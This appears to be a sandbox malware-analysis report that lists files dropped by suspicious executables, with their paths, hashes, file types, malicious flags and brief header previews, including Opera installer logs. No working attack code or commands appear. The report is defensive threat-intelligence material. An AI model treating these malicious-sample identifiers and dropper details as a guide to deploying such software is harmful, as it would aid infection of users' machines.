SSDEEP:96:ecR5vxiKB+iDDdUsP95KeQX5glFuX5glcNwX5gl5X5glsX5glsX5glu8:ecRxJ/HJl5Kv5gm5gai5gD5gS5gS5gg8
MD5:FBA4B9071E9E62C5937CE6C5CE0F6A2C
SHA1:89291417D428C93A1172EBFD1C826BAF94B4FF58
SHA-256:8E593041B2EB5B54A643DD9FC22B329D59DC52F0A4A659CCEB122136480EC901
SHA-512:ADDB51480E95E30B2799FE73C3157B5671F1C0A80A8A53637B9A7F1651D7571184F16AF42CD38A01EA344F9738C4600540FDCDA1C66CC68A1C8B644C756FDAF1
Malicious:false
Reputation:unknown
Preview:
[0423/213748.763:INFO:installer_main.cc(455)] Opera installer starting - version 109.0.5097.59 Stable
[0423/213748.763:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
[0423/213748.763:INFO:installer_main.cc(480)] Uninstall:0
[0423/213748.763:INFO:installer_main.cc(481)] Silent:1
[0423/213748.763:INFO:installer_main.cc(482)] Run Immediately0
[0423/213748.763:INFO:installer_main.cc(484)] Backend0
[0423/213748.763:INFO:installer_main.cc(485)] Inside package0
[0423/213748.763:INFO:installer_main.cc(486)] Autoupdate:0
[0423/213748.763:INFO:payload_manager_impl.cc(97)] Reading Payload
[0423/213748.763:INFO:installer_main.cc(636)] Tracking data: ZTI5ZTU0MTIzODcyYTZhMTcyNGU3MDI0YTc5NjZhZWY1YjM4M2UyMTc2ZmY4MDlkMTdmM2VhZDJlYWYxNTkyZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N
Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
File Type:ASCII text, with very long lines (533)
Category:modified
Size (bytes):4109
Entropy (8bit):5.609579175188986
Encrypted:false
SSDEEP:96:DxtGY5UxiZB+imSU6nHOHAeMX5gl2X5glyNWVK:DOY5U4/m2uHAv5gw5gIGK
MD5:A5B63AB86A63EB9CF5198B523BE2BE84
SHA1:2BD63F8019953F7DCD13354E0D9913369E34E9F4
SHA-256:E9D8E3FC56303C5FA5470B2D97D77C830C13F20362808A9DB61C3A5054A9B894
SHA-512:2DC7289A810822176D42257A5D717310CF923CE31B599CF4B7BCD8B65B092007B27ABF1A2BE930FAF115A53F6C6780B2FEC183733E92A65A7D498E1161C8DD9F
Malicious:false
Reputation:unknown
Preview:
[0423/213755.093:INFO:installer_main.cc(455)] Opera installer starting - version 109.0.5097.59 Stable
[0423/213755.093:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
[0423/213755.093:INFO:installer_main.cc(480)] Uninstall:0
[0423/213755.093:INFO:installer_main.cc(481)] Silent:1
[0423/213755.093:INFO:installer_main.cc(482)] Run Immediately0
[0423/213755.093:INFO:installer_main.cc(484)] Backend0
[0423/213755.093:INFO:installer_main.cc(485)] Inside package0
[0423/213755.093:INFO:installer_main.cc(486)] Autoupdate:0
[0423/213755.093:INFO:payload_manager_impl.cc(97)] Reading Payload
[0423/213755.093:INFO:installer_main.cc(636)] Tracking data: NGJiNjYxNmIzODYzNTk4ODA1YmVjMmI1YzJiODU4YjA5ODFhYjZiMTMyYTUwNDZlY2EwMDdhZmRhNGNjYzNmZDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N
Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):45056
Entropy (8bit):3.5332979736228234
Encrypted:false
SSDEEP:384:wfMgzBSh6zuHkasb6STAr/aextOeILdvVngwoix66SmjLg5nWStmW:wV66q86S2lqdOtixrSmjE5J
MD5:05ED92AC05830BA09526D6231D4E8B1A
SHA1:1E6AA5C9B9EF1B3A0D502AC9BA91497421DA2116
SHA-256:733A75B43EC066455CD1DB33C77F7A18DC4BA45686D20FBA1B750E7F5856CAA7
SHA-512:4CCC5832A116368CF67B3DC9CDEA7ACB47CCFA05411D5CA932ACFDD1B4FA5F7B11C0E75AF405CF2677A51189441EB7B1F2D507B7963E3EC847DF221D6030525B
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7157248
                                                                                                                                                                                                                                Entropy (8bit):7.756166190918081
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:UG0rMh5vMNSBl4rs5EiJlLMBiLPUGylg28X3:U5QSWmkEiJlLMY7UGU/8n
                                                                                                                                                                                                                                MD5:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
                                                                                                                                                                                                                                SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
                                                                                                                                                                                                                                SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                Entropy (8bit):5.477136942248282
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5z8HovO2mFvJESmeC9608TZ1hCdqn5P3h1URujKbMYYw9a6tIUXs7+eFkQoVhC8N:Roo2dFvJES69B8F1hnVURujKbMYYw9ah
                                                                                                                                                                                                                                MD5:670A933CB5C72952048FF28FE3F2F8DB
                                                                                                                                                                                                                                SHA1:7164A88DC523BDB46F2C068D6753EE77F832F390
                                                                                                                                                                                                                                SHA-256:6B594B0E5FE197A67D966C812C6229E0F99FA665BD4C4F3A190ED536D37CB27A
                                                                                                                                                                                                                                SHA-512:FF256868E85355EACC5D617A05CDEB7488BDC758301F256C2385EA81A0FCA1D7F2518F34CDDBDAAB3D11518F89E577B93486A4881DF6DA615A75557A79DF1BD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..............A.+..Z.....Z...........Z.....Z..9..Z.....Z.-....Z.....Rich...........PE..d................"......`.....................@.............................`......+.....`.......... ..........................................l....@..@....... ............P..........T...........................Pu..@............v..h............................text....R.......`.................. ..`.rdata..v....p.......p..............@..@.data...............................@....pdata.. ........ ..................@..@.didat..X....0.......0..............@....rsrc...@....@.......@..............@..@.reloc.......P.......P..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                Entropy (8bit):2.6590314350435986
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:oikEYaNKFFB4HvTeEkbvRcDXOgW63deOzGmOgKKE2cx/dZm5GJ1KDJD/YWcb:BIaNKFH4PTeRbQ+uevK6mI1KD2Wcb
                                                                                                                                                                                                                                MD5:6E4F49AC5D02B7517DCE5A2777CFDBB1
                                                                                                                                                                                                                                SHA1:8E5F4A71774B6AF0ECFB81FFA9B29D2E8EFABE44
                                                                                                                                                                                                                                SHA-256:0209F862AA595E9E155644830F380E9753DC58357967EF8252FA2FC7EA717C7E
                                                                                                                                                                                                                                SHA-512:094CC4E23C76BA7C77A14413C62AC1DB0F13DB7DAFECC4BF166341FE60157E330D952D8A8800CEDCF3BCD3025197AACD70BB09FB81CCE950F86BA5EACACEC5DB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.....]..]..]A..\..]A..\..]A..\..]A..\..]..]%.]A..\..]A.P]..]A..\..]Rich..]........PE..d................."...... ...`......P..........@..........................................`.......... .......................................8..P....`.......P..................0...h4..T............................0..@...........P1..p............................text... ........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....pdata.......P.......P..............@..@.rsrc........`... ...`..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7157248
                                                                                                                                                                                                                                Entropy (8bit):7.756166190918081
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:UG0rMh5vMNSBl4rs5EiJlLMBiLPUGylg28X3:U5QSWmkEiJlLMY7UGU/8n
                                                                                                                                                                                                                                MD5:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
                                                                                                                                                                                                                                SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
                                                                                                                                                                                                                                SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4834208
                                                                                                                                                                                                                                Entropy (8bit):6.878934082977637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:76666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwJ:dPMki6zio75L3pf3dedO4keCIwkoYbgZ
                                                                                                                                                                                                                                MD5:CB9F8AC8C123DE6EF018CD36E39D4A61
                                                                                                                                                                                                                                SHA1:30733F7B86743531636AFFC6E0394F9C3189B3D0
                                                                                                                                                                                                                                SHA-256:EA03FE24040A07D65144D51BC06535B2D5104CFC761934E8D2E6C12887F11481
                                                                                                                                                                                                                                SHA-512:11D4B2F2EB43258D26DBCB6E0F11A941685491E42EDA38A3A628E31D278F346B559F7B407AB658163D01A7576E57A49462B156073C71D8EB6621BF25DBD7B1AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."!......3..|.......L*......................................PK......YJ...@A......................... ;.m....!;......`=..4............I..)....I.D...\.:.......................:......73.............D,;.8.....;.`....................text...x.3.......3................. ..`.rdata...^...03..`....3.............@..@.data.........;..@...|;.............@....rodata......0=.......;............. ..`.tls....]....@=.......;.............@...CPADinfo0....P=.......;.............@....rsrc....4...`=..6....;.............@..@.reloc..D.....I.......G.............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4834208
                                                                                                                                                                                                                                Entropy (8bit):6.878934082977637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:76666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwJ:dPMki6zio75L3pf3dedO4keCIwkoYbgZ
                                                                                                                                                                                                                                MD5:CB9F8AC8C123DE6EF018CD36E39D4A61
                                                                                                                                                                                                                                SHA1:30733F7B86743531636AFFC6E0394F9C3189B3D0
                                                                                                                                                                                                                                SHA-256:EA03FE24040A07D65144D51BC06535B2D5104CFC761934E8D2E6C12887F11481
                                                                                                                                                                                                                                SHA-512:11D4B2F2EB43258D26DBCB6E0F11A941685491E42EDA38A3A628E31D278F346B559F7B407AB658163D01A7576E57A49462B156073C71D8EB6621BF25DBD7B1AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."!......3..|.......L*......................................PK......YJ...@A......................... ;.m....!;......`=..4............I..)....I.D...\.:.......................:......73.............D,;.8.....;.`....................text...x.3.......3................. ..`.rdata...^...03..`....3.............@..@.data.........;..@...|;.............@....rodata......0=.......;............. ..`.tls....]....@=.......;.............@...CPADinfo0....P=.......;.............@....rsrc....4...`=..6....;.............@..@.reloc..D.....I.......G.............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8538160
                                                                                                                                                                                                                                Entropy (8bit):7.894832692431241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
                                                                                                                                                                                                                                MD5:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                SHA1:E3F63366D0CC19D48A727ABF1954B5FC4E69035A
                                                                                                                                                                                                                                SHA-256:4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
                                                                                                                                                                                                                                SHA-512:F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...A..c.....................(t...................@.................................)....@......@..............................(4...0....r.............0P......x6...................................................................................text............................... ..`.itext..T........................... ..`.data...,'.......(..................@....bss.... S... ...........................idata..(4.......6..................@....didata.............................@....tls....<............2...................rdata...............2..............@..@.reloc..h6.......8...4..............@..B.rsrc.....r..0....r..l..............@..@.............@.......z..............@..@........................................................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1640960
                                                                                                                                                                                                                                Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2469936
                                                                                                                                                                                                                                Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20891
                                                                                                                                                                                                                                Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1385173
                                                                                                                                                                                                                                Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1596416
                                                                                                                                                                                                                                Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):7175750
Entropy (8bit):7.997145606333841
Encrypted:true
SSDEEP:98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
MD5:15FE0C4C282DF938F0AE415334FC8D11
SHA1:0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
SHA-256:EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
SHA-512:FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\u69w.1.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):89
Entropy (8bit):4.612480060639111
Encrypted:false
SSDEEP:3:qRXQmfzIojaFKWiLGgKqr5iYJQEB82en:qNzVGFKDLGgKK5ifPn
MD5:A3DF7E83121B19D98AF8E93D0E7A16D9
SHA1:1EA34D1635425195AA010D74BEFFB2FA72945AB2
SHA-256:D5AF45E4F4BF4BC9E820141387DECBF8A8D53A8DE0144F43915AB9D67BD99F12
